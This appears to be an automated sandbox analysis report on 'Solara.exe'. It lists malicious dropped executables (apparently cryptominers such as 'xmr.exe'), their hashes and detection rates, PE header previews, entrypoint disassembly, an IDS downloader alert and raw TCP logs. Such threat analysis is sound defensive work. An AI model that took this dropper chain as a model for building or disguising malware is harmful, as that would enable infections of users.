                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w014t2nr.qkp.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\eth.exe

                        Download File
                        Process:C:\Users\user\Desktop\Solara.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5468672
                        Entropy (8bit):6.523912582824609
                        Encrypted:false
                        SSDEEP:98304:CKloGqNsn3EQMZrDn2aOzO5wzv80/rvVioLICFIJV6MGG/ZclhOP9fjSmlNi/LbP:Rloly39MBD2BiwPDV/IkIJV6AZcL49fy
                        MD5:87C3DD67BFA3009D89F7B45B01D705B8
                        SHA1:7EB74405565DD5971298B2A2C8DE9116D08DB2D5
                        SHA-256:92722D28951672263B79CD30EB975D770CFD5BD5FF53344FD329546FB950F155
                        SHA-512:C79F10712BB505D3645C9FDF8EF11BD787AB327FC2F176302DE71B5D4A886026E46E40338A5DB964E4B42BD152F3279FDA8F2F842F99876BEE1B0783D2F74E0E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 68%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....;.f.........."...........R.....@..........@..............................S...........`.....................................................<.............S...............S.x...............................(.......8...........x...`............................text...F........................... ..`.rdata..l$.......&..................@..@.data.....R.......R.................@....pdata........S......jS.............@..@.00cfg........S......lS.............@..@.tls..........S......nS.............@....reloc..x.....S......pS.............@..B................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\kx new.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe
                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):10948608
                        Entropy (8bit):6.9823288417626
                        Encrypted:false
                        SSDEEP:196608:p+lBkH0sN5KVaq4Jsbwd+mftM8y+uevftTJp3q73uGiCHz/u/dLTu:l0saVF4Js8d+F+53Ra3Tj41u
                        MD5:D9D13FA25E880665FB471A4BE57C494C
                        SHA1:7A4C1B09A9D37FF55872544A39A2CC5F0EEC9523
                        SHA-256:632E973AB369D51E21B499E440BDD9C4B2FFAAC9E435485A648DE8724E1B19F7
                        SHA-512:CF20F3C108865614A27D498EE74198EE151027423B518024155B1DFF553B33877AED81E7D5394094625D1EE7DA5DE82FA4ED119420009A3F3FC51019ADD3522E
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 71%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................@.......o..........................................P....0..................................................................................X............................text...h........................... ..`.rdata....... ......................@..@.bss......... ...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\xmr new.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\kx new.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5471744
                        Entropy (8bit):6.508687886623363
                        Encrypted:false
                        SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                        MD5:7D6398EBFB82A24748617189BF4AD691
                        SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                        SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                        SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\xmr.exe

                        Download File
                        Process:C:\Users\user\Desktop\Solara.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5468672
                        Entropy (8bit):6.519628355610314
                        Encrypted:false
                        SSDEEP:98304:LOl8w9dke5gARmiTqHc2+i72sq2GMbo9GYaUbTvcB7abEUGyxByPuZ0:LOlj9dkC8c2F2D2G1GVLB7WBBNG
                        MD5:154202154E41175E801A698CA940EB0C
                        SHA1:6CE074D67C91CB00016CB1095319B00AFAB396A8
                        SHA-256:0612BFB5A51B0B413BA960F7D52BC647BD4CF7530FD760C0D6006AA829E806E2
                        SHA-512:7D0A7474C28B87972FB02A48EE56A2549765A584A53ABBD123631E142A655B17F3508B7D3C2B90F3174D118940143AF12728355900472F27FE8280AA11A8F540
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 76%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....;.f.........."...........R.....@..........@..............................S...........`.....................................................<.............S...............S.x...............................(.......8...........x...`............................text............................... ..`.rdata..l$.......&..................@..@.data.....R.......R.................@....pdata........S......jS.............@..@.00cfg........S......lS.............@..@.tls..........S......nS.............@....reloc..x.....S......pS.............@..B................................................................................................................................................................................................................................................................................................................................................

                        \Device\ConDrv

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        File Type:ASCII text, with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):1777
                        Entropy (8bit):3.548832160380353
                        Encrypted:false
                        SSDEEP:24:AHq6saJQXQK6zkp5nFC3xtKEkyNodeI5nFC3udee:6s/Xv6zklC3aEky+de2C3udee
                        MD5:6B22E6EF2B3890EABF2B786625B0194C
                        SHA1:33B927413CB71314A4A6D4300793CFCDFF179477
                        SHA-256:FE3EBD9F7FD8EC38410E0A064C6B8BAA2E67DB5F5EF9462380D4E7AFCF134DB6
                        SHA-512:0C6E2F2D62EDAB4C25FE0680725A3BC2015FF9575385665B9D76FC3B7BDE8F4CB1664CD6C6EE35F63FBDFC39E4BE9FB75EBFFB8ED10F135B6C8D874F7E979388
                        Malicious:false
                        Preview: ,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Entropy (8bit):7.026619238846845
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.94%
                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Solara.exe
                        File size:22'179'840 bytes
                        MD5:a6bf6970741f337bcb700166165c1f30
                        SHA1:f90ace8f03e2b76e243d539c8570d157f658d025
                        SHA256:139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1
                        SHA512:c5ef34314bfbd5db99d8d02981e4ce5b46776bdae87e4768963fa902319a4d9712afe7bca302688a424eb9e7dffb9aa5da8444ea2877a48e3f9dd67622477521
                        SSDEEP:393216:fOQxoHOKgCanLd/l/NmA6MierK6sl0Ibft5/TqcJb45EGle:2hOKgj/4MTrKV9ft5bqR5EGle
                        TLSH:0D2733B62ACFD40FCB856F7C865FA73A187D01AA8D378E416C2D6642D4D482119F1FA3
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................dR..............`N...@...........................R......JS....................................

                        File Icon

                        Icon Hash:f0e9c4f0d8e972c3

                        Static PE Info

                        General

                        Entrypoint:0x401509
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:a9c887a4f18a3fede2cc29ceea138ed3

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 00000008h
                        nop
                        mov eax, 00000004h
                        push eax
                        mov eax, 00000000h
                        push eax
                        lea eax, dword ptr [ebp-04h]
                        push eax
                        call 00007F2080BC82CDh
                        add esp, 0Ch
                        mov eax, 004014E7h
                        push eax
                        call 00007F2080BC8307h
                        mov eax, 00000001h
                        push eax
                        call 00007F2080BC8304h
                        add esp, 04h
                        mov eax, 00030000h
                        push eax
                        mov eax, 00010000h
                        push eax
                        call 00007F2080BC82F8h
                        add esp, 08h
                        mov eax, dword ptr [018E5E34h]
                        mov ecx, dword ptr [018E5E38h]
                        mov edx, dword ptr [018E5E3Ch]
                        mov dword ptr [ebp-08h], eax
                        lea eax, dword ptr [ebp-04h]
                        push eax
                        mov eax, dword ptr [018E6000h]
                        push eax
                        push edx
                        push ecx
                        mov eax, dword ptr [ebp-08h]
                        push eax
                        call 00007F2080BC82D2h
                        add esp, 14h
                        mov eax, dword ptr [018E5E34h]
                        mov ecx, dword ptr [018E5E38h]
                        mov edx, dword ptr [018E5E3Ch]
                        mov dword ptr [ebp-08h], eax
                        mov eax, dword ptr [edx]
                        push eax
                        mov eax, dword ptr [ecx]
                        push eax
                        mov eax, dword ptr [ebp-08h]
                        mov eax, dword ptr [eax]
                        push eax
                        call 00007F2080BC80ACh
                        add esp, 0Ch
                        push eax
                        call 00007F2080BC82A8h
                        add esp, 04h
                        leave
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 00000004h
                        nop
                        mov eax, dword ptr [018E5E34h]
                        mov ecx, dword ptr [ebp+08h]
                        mov dword ptr [eax], ecx
                        mov eax, dword ptr [00000000h]

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x14e5dc00x50.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x14e70000x423f0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x14e5e100x58.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x6a00x800de9df424dae4316c171c3c4920f66543False0.4248046875data4.823881234246199IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x20000x14e3fc30x14e40008e808ee215270786bdb726af73024b70unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .bss0x14e60000x40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x14e70000x423f00x424004d4544f74f875dd64302964ba5b118d9False0.34380527712264153data5.609529478350963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x14e71000x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144EnglishUnited States0.3433810693256798
                        RT_GROUP_ICON0x15291280x14dataEnglishUnited States1.1
                        RT_MANIFEST0x15291400x2aeXML 1.0 document, ASCII textEnglishUnited States0.478134110787172

                        Imports

                        DLLImport
                        msvcrt.dllmalloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                        shell32.dllShellExecuteA
                        kernel32.dllSetUnhandledExceptionFilter

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-01-07T16:05:20.422524+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549706140.82.121.4443TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 7, 2025 16:05:17.186470032 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:17.186516047 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:17.188118935 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:17.247186899 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:17.247210026 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:17.873106003 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:17.873173952 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:17.936115980 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:17.936139107 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:17.937069893 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:17.978161097 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.249665976 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.295325994 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.585939884 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.586210012 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.586235046 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.586261034 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.586293936 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.586312056 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.586386919 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.586427927 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.586437941 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.586481094 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.586518049 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.586525917 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.587152958 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.587192059 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.587199926 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.655277967 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.670897007 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672024965 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672050953 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672068119 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.672076941 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672089100 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672122955 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.672138929 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672177076 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.672386885 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672533989 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672558069 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672580957 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.672594070 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.672629118 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.673072100 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673122883 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673178911 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.673186064 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673197031 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673237085 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.673247099 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673779964 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673820019 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.673840046 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673918962 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673948050 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673955917 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.673964977 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.673996925 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.674593925 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.755739927 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.755815983 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.755851030 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.756998062 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.757050037 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.757057905 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.757179022 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.757239103 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.757246017 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758178949 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758227110 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.758235931 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758292913 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758315086 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758339882 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.758347988 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758385897 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.758398056 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758853912 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.758908033 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.758914948 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759083986 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759114027 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759138107 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759144068 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.759150982 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759188890 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.759327888 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759349108 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759399891 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.759407997 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.759480953 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.759964943 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760037899 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760072947 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760073900 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.760086060 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760127068 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.760133028 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760176897 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760207891 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760216951 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.760224104 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.760262012 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.760900974 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761012077 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761044025 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761046886 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.761054993 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761094093 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761102915 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.761111021 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761149883 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.761157990 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761810064 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761852026 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.761862040 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761888981 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761910915 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.761945963 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.761953115 CET44349704140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:18.762002945 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.780438900 CET49704443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:18.858731985 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:18.858781099 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:18.858877897 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:18.859226942 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:18.859240055 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:19.357331038 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:19.357492924 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:19.362468958 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:19.362476110 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:19.362728119 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:19.365564108 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:19.411323071 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:19.491255045 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:19.491354942 CET44349705185.199.108.133192.168.2.5
                        Jan 7, 2025 16:05:19.491626024 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:19.492124081 CET49705443192.168.2.5185.199.108.133
                        Jan 7, 2025 16:05:19.507100105 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:19.507158041 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:19.507306099 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:19.507644892 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:19.507664919 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.155158043 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.157527924 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.157560110 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.422529936 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.422607899 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.422635078 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.422657967 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.422669888 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.422683954 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.422683954 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.422713995 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.423249960 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.423290968 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.423342943 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.423361063 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.463001966 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.463033915 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.463419914 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.463454008 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.463500023 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.507205009 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515094995 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515157938 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515186071 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515223026 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515295982 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.515350103 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515367031 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.515568972 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515644073 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515661955 CET49706443192.168.2.5140.82.121.4
